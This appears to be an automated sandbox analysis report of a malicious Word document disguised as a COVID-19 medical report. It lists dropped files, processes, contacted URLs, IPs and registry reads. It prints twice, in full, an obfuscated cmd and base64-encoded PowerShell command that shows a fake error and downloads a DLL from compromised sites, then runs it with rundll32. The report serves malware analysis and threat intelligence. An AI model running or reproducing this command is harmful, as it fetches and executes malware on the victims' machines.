Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
XP-9743 Medical report COVID-19.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips
TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal,
Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word,
Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of
Words: 2466, Number of Characters: 14061, Security: 8
|
initial sample
|
||
C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12
2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://avadnansahin.com
|
unknown
|
||
http://hellas-darmstadt.de/cgi-bin/ZSoo/
|
unknown
|
||
http://solicon.us/allam-cycle-1c4gn/f5z/
|
unknown
|
||
http://avadnansahin.com/wp-includes/w/
|
109.232.216.177
|
||
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
|
unknown
|
||
https://remediis.com
|
unknown
|
||
http://www.riparazioni-radiotv.com/softaculous/DZz/
|
unknown
|
||
https://www.starlingtechs.com/GNM/
|
unknown
|
||
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
|
69.49.88.46
|
||
https://remediis.com/t/gm2X/
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://remediis.comp
|
unknown
|
||
http://www.litespeedtech.com
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
remediis.com
|
5.2.81.171
|
||
avadnansahin.com
|
109.232.216.177
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
69.49.88.46
|
unknown
|
United States
|
unknown
|
||
109.232.216.177
|
unknown
|
Turkey
|
unknown
|
||
71.72.196.159
|
unknown
|
United States
|
unknown
|
||
5.2.81.171
|
unknown
|
Turkey
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
6s7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
t7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
6v7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC320
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
